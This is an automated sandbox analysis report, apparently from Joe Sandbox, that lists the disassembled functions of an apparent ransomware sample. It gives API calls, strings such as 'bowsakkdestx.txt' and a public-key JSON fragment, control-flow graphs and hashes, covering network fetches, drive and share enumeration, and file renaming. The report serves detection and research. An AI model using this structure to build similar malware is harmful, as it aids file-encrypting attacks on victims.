                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                        • Opcode ID: 521235e79a6bc649248c37c32e44bd9446b2149fc8f9ef1bae25cebca29bdec1
                                                                                                        • Instruction ID: 41cd88e24e6f22b2a865dd2da94b490aa06133e4ab8a3249e5ba5b8178d1f7ae
                                                                                                        • Opcode Fuzzy Hash: 521235e79a6bc649248c37c32e44bd9446b2149fc8f9ef1bae25cebca29bdec1
                                                                                                        • Instruction Fuzzy Hash: 72111B7598020CFBDB109F90CD46FEEBB78EF04B14F104195EA04F21A1D7B15A14BA95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2251 f1e6e8-f1e6ef 2252 f1e6f0-f1e722 call f2b420 call f0c500 2251->2252 2257 f1e724-f1e729 2252->2257 2258 f1e72e-f1e772 InternetOpenW 2252->2258 2259 f1ea1f-f1ea40 call f23cf0 2257->2259 2260 f1e774-f1e776 2258->2260 2261 f1e778-f1e77d 2258->2261 2268 f1ea42-f1ea46 2259->2268 2269 f1ea8d-f1eacc lstrlenA lstrcpyA * 2 lstrlenA 2259->2269 2263 f1e78f-f1e7b8 call f15ae0 call f21c02 2260->2263 2264 f1e780-f1e789 2261->2264 2284 f1e882-f1e8e5 call f15ae0 call f13ff0 call f12900 call f159d0 2263->2284 2285 f1e7be-f1e7f7 call f14690 call f0dd40 2263->2285 2264->2264 2266 f1e78b-f1e78d 2264->2266 2266->2263 2272 f1ee2a-f1ee3a call f11b10 2268->2272 2273 f1ea4c-f1ea61 SHGetFolderPathA 2268->2273 2274 f1eaef-f1eb12 2269->2274 2275 f1eace 2269->2275 2291 f1ee4d-f1ee82 call f0ef50 2272->2291 2292 f1ee3c-f1ee3f 2272->2292 2273->2252 2280 f1ea67-f1ea88 PathAppendA DeleteFileA 2273->2280 2278 f1eb14-f1eb16 2274->2278 2279 f1eb18-f1eb1f 2274->2279 2281 f1ead0-f1ead8 2275->2281 2287 f1eb2b-f1eb4f call f156d0 call f12900 2278->2287 2288 f1eb22-f1eb27 2279->2288 2280->2252 2282 f1eaeb 2281->2282 2283 f1eada-f1eae7 lstrlenA 2281->2283 2282->2274 2283->2281 2289 f1eae9 2283->2289 2344 f1e8f3-f1e917 lstrcpyW 2284->2344 2345 f1e8e7-f1e8f0 call f22587 2284->2345 2309 f1e7f9-f1e7fe 2285->2309 2310 f1e86f-f1e874 2285->2310 2314 f1eb51 2287->2314 2315 f1eb53-f1eb66 lstrcpyW 2287->2315 2288->2288 2294 f1eb29 2288->2294 2289->2274 2306 f1ee86-f1ee8c 2291->2306 2297 f1e6e0-f1e6e6 2292->2297 2294->2287 2297->2252 2311 f1ee92-f1ee94 2306->2311 2312 f1ee8e-f1ee90 2306->2312 2317 f1e800-f1e809 call f22587 2309->2317 2318 f1e80c-f1e827 2309->2318 2310->2284 2316 f1e876-f1e87f call f22587 2310->2316 2321 f1ee97-f1ee9c 2311->2321 2319 f1eea0-f1eeaf call f13ea0 2312->2319 2314->2315 2322 f1eb74-f1ebe4 lstrlenA call f20c62 call f2b420 MultiByteToWideChar lstrcpyW call f23cf0 2315->2322 2323 f1eb68-f1eb71 call f22587 2315->2323 2316->2284 2317->2318 2329 f1e842-f1e848 2318->2329 2330 f1e829-f1e82d 2318->2330 2319->2306 2341 f1eeb1-f1eee3 call f0ef50 2319->2341 2321->2321 2332 f1ee9e 2321->2332 2369 f1ebe6-f1ebea 2322->2369 2370 f1ec3d-f1ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 2322->2370 2323->2322 2335 f1e84e-f1e86c 2329->2335 2330->2335 2339 f1e82f-f1e840 call f205a0 2330->2339 2332->2319 2335->2310 2339->2335 2360 f1eee7-f1eeed 2341->2360 2348 f1e943-f1e97a InternetOpenUrlW InternetReadFile 2344->2348 2349 f1e919-f1e920 2344->2349 2345->2344 2356 f1e9ec-f1ea08 InternetCloseHandle * 2 2348->2356 2357 f1e97c-f1e994 SHGetFolderPathA 2348->2357 2349->2348 2354 f1e922-f1e92e 2349->2354 2361 f1e930-f1e935 2354->2361 2362 f1e937 2354->2362 2358 f1ea16-f1ea19 2356->2358 2359 f1ea0a-f1ea13 call f22587 2356->2359 2357->2356 2364 f1e996-f1e9c2 PathAppendA call f220b6 2357->2364 2358->2259 2359->2358 2366 f1eef3-f1eef5 2360->2366 2367 f1eeef-f1eef1 2360->2367 2368 f1e93c-f1e93d lstrcatW 2361->2368 2362->2368 2364->2356 2384 f1e9c4-f1e9e9 lstrlenA call f22b02 call f23a38 2364->2384 2374 f1eef8-f1eefd 2366->2374 2373 f1ef01-f1ef10 call f13ea0 2367->2373 2368->2348 2369->2272 2375 f1ebf0-f1ec11 SHGetFolderPathA 2369->2375 2377 f1ec99 2370->2377 2378 f1ecbf-f1ecdd 2370->2378 2373->2360 2395 f1ef12-f1ef4c call f13ff0 call f12900 2373->2395 2374->2374 2381 f1eeff 2374->2381 2375->2252 2383 f1ec17-f1ec38 PathAppendA DeleteFileA 2375->2383 2385 f1eca0-f1eca8 2377->2385 2379 f1ece3-f1eced 2378->2379 2380 f1ecdf-f1ece1 2378->2380 2387 f1ecf0-f1ecf5 2379->2387 2386 f1ecf9-f1ed1b call f156d0 call f12900 2380->2386 2381->2373 2383->2297 2384->2356 2390 f1ecbb 2385->2390 2391 f1ecaa-f1ecb7 lstrlenA 2385->2391 2406 f1ed1d 2386->2406 2407 f1ed1f-f1ed35 lstrcpyW 2386->2407 2387->2387 2393 f1ecf7 2387->2393 2390->2378 2391->2385 2392 f1ecb9 2391->2392 2392->2378 2393->2386 2408 f1ef50-f1ef68 lstrcpyW 2395->2408 2409 f1ef4e 2395->2409 2406->2407 2410 f1ed43-f1edab lstrlenA call f20c62 call f2b420 MultiByteToWideChar lstrcpyW lstrlenW 2407->2410 2411 f1ed37-f1ed40 call f22587 2407->2411 2413 f1ef76-f1efb3 call f13ff0 call f12900 2408->2413 2414 f1ef6a-f1ef73 call f22587 2408->2414 2409->2408 2425 f1edad-f1edb6 lstrlenW 2410->2425 2426 f1edbc-f1edc1 2410->2426 2411->2410 2431 f1efb5 2413->2431 2432 f1efb7-f1efc6 lstrcpyW 2413->2432 2414->2413 2425->2426 2428 f1ee44-f1ee48 2425->2428 2429 f1ee10-f1ee12 2426->2429 2430 f1edc3-f1ede4 SHGetFolderPathA 2426->2430 2433 f1f01a-f1f030 2428->2433 2435 f1ee14-f1ee1a call f20bed 2429->2435 2436 f1ee1d-f1ee1f 2429->2436 2430->2252 2434 f1edea-f1ee0b PathAppendA DeleteFileA 2430->2434 2431->2432 2437 f1efd4-f1efe0 2432->2437 2438 f1efc8-f1efd1 call f22587 2432->2438 2434->2297 2435->2436 2436->2272 2442 f1ee21-f1ee27 call f20bed 2436->2442 2439 f1efe2-f1efeb call f22587 2437->2439 2440 f1efee-f1f008 2437->2440 2438->2437 2439->2440 2447 f1f016 2440->2447 2448 f1f00a-f1f013 call f22587 2440->2448 2442->2272 2447->2433 2448->2447
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F1E707
                                                                                                          • Part of subcall function 00F0C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F0C51B
                                                                                                        • InternetOpenW.WININET ref: 00F1E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F1E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F1E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F1E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F1E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F1E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F1EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F1EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F1EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F1EB86
                                                                                                        • _memset.LIBCMT ref: 00F1EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F1EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F1EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EC32
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                        • Opcode ID: 4d2bb706444261eb452247fb3bb8094ba56bfad4a12b7cdadce7f9967f7ef226
                                                                                                        • Instruction ID: 5b1de9333b9d790a653e7cee5ae1b886ba884276e4aa162948d1784ca3ef3744
                                                                                                        • Opcode Fuzzy Hash: 4d2bb706444261eb452247fb3bb8094ba56bfad4a12b7cdadce7f9967f7ef226
                                                                                                        • Instruction Fuzzy Hash: C9015E71448395AAD630DF209C09FDF7BD8AF51704F44481DFD8893182EB78A248A7A7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F11B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,00F1EE2F), ref: 00F11B1E
                                                                                                        • timeGetTime.WINMM(?,?,00F1EE2F), ref: 00F11B29
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11B4C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F11B5C
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11B6A
                                                                                                        • Sleep.KERNEL32(00000064,?,?,00F1EE2F), ref: 00F11B72
                                                                                                        • timeGetTime.WINMM(?,?,00F1EE2F), ref: 00F11B78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697694649-0
                                                                                                        • Opcode ID: 70e00d3c7ca9863c5b97137e741ed8003539c8c560fd0d1e5621bbac3d6ff8f6
                                                                                                        • Instruction ID: 8480a2efe41423b6e2a9e31a4c826571f70f5929b3924b152e85f038ad66e984
                                                                                                        • Opcode Fuzzy Hash: 70e00d3c7ca9863c5b97137e741ed8003539c8c560fd0d1e5621bbac3d6ff8f6
                                                                                                        • Instruction Fuzzy Hash: E8018F32E40319AADB20EBE59D42FEDB76CBB88B50F044066F704B71D0E674A941DBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F0C51B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F0C539
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: 90717251b0fcf13363ddd906e1224d6163558844bf0fcca1c48b980f44bf27fa
                                                                                                        • Instruction ID: f13fc6840c3351d18b837a6918a0691152ce2a0c46435a7553decb71bc6d2cd8
                                                                                                        • Opcode Fuzzy Hash: 90717251b0fcf13363ddd906e1224d6163558844bf0fcca1c48b980f44bf27fa
                                                                                                        • Instruction Fuzzy Hash: 1611E7B6A8022832D93071697C47FEF735C9F42721F0401A2FE0C97182A56E965675E2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F1BAAD
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00F1BABE
                                                                                                        • UpdateWindow.USER32(00000000), ref: 00F1BAC5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                        • Opcode ID: 27f16c287b934527817e5bb3cdbf4ec95665a07aa20ce46644fb8ab2be97fa62
                                                                                                        • Instruction ID: 82b08a784566cdd258f75c1b463ba5949a2ea1a9a5503cfd08f3b128a3835aba
                                                                                                        • Opcode Fuzzy Hash: 27f16c287b934527817e5bb3cdbf4ec95665a07aa20ce46644fb8ab2be97fa62
                                                                                                        • Instruction Fuzzy Hash: E1E01A31681764BAF23257167D0BF963514BB05F20F204109FA447E2C4C6EA68429BCC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F10BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F10C12
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00F10C39
                                                                                                        • _memset.LIBCMT ref: 00F10C4C
                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00F10C63
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 364255426-0
                                                                                                        • Opcode ID: 8b15944d6fd135bc9d430b9cfc93946d25b25960bc0f189668f793c297194f01
                                                                                                        • Instruction ID: a4dbaaa30a5d6a9c44f0d8485a1b1792e6cbebd30cf620a9b67c55f0f1d20ac4
                                                                                                        • Opcode Fuzzy Hash: 8b15944d6fd135bc9d430b9cfc93946d25b25960bc0f189668f793c297194f01
                                                                                                        • Instruction Fuzzy Hash: 9B91BF75A08341CFD728DF68D891BABB7E1FF84714F14891DF48A87281DBB4A980DB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F10A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00F10A75
                                                                                                        • SetErrorMode.KERNEL32(00000001,01000234,00000002), ref: 00F10AE2
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00F10AF9
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F10B02
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00F10B1B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                        • String ID:
                                                                                                        • API String ID: 2560635915-0
                                                                                                        • Opcode ID: 2d81a2055eab71d7b7257419e570a5518ab6a0a1c05bbc45325dbe9d7b55d296
                                                                                                        • Instruction ID: 7948eee4ace612e91a50352321ed9569d9a1d2fbfb242b7f96af899953490228
                                                                                                        • Opcode Fuzzy Hash: 2d81a2055eab71d7b7257419e570a5518ab6a0a1c05bbc45325dbe9d7b55d296
                                                                                                        • Instruction Fuzzy Hash: C841F2715083409FC710DF69C885B8BBBE4BB84728F400A2DF085972A2DBB9D684CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974526305-0
                                                                                                        • Opcode ID: 9e77ca378067106b382c1612874db5bfe6f7ab6856e5f5fd42cfca243cc5d73c
                                                                                                        • Instruction ID: 33088037b1fd7484daa76a5f0ccce5f8f07949c674f2f4f444154f68c3dd251a
                                                                                                        • Opcode Fuzzy Hash: 9e77ca378067106b382c1612874db5bfe6f7ab6856e5f5fd42cfca243cc5d73c
                                                                                                        • Instruction Fuzzy Hash: CF51C531E00325FBEB648FA9AC80A6E77B1AF11330F248729F835962D0D7759D60EB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F1B1BA
                                                                                                          • Part of subcall function 00F111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F1120F
                                                                                                          • Part of subcall function 00F111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F11228
                                                                                                          • Part of subcall function 00F111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1123D
                                                                                                          • Part of subcall function 00F111C0: MoveFileW.KERNEL32(00000000,?), ref: 00F11277
                                                                                                          • Part of subcall function 00F1BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00F1BA4A
                                                                                                          • Part of subcall function 00F1BA10: RegisterClassExW.USER32(00000030), ref: 00F1BA73
                                                                                                          • Part of subcall function 00F1BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F1BAAD
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B4B3
                                                                                                        • TranslateMessage.USER32(?), ref: 00F1B4CD
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1B4D7
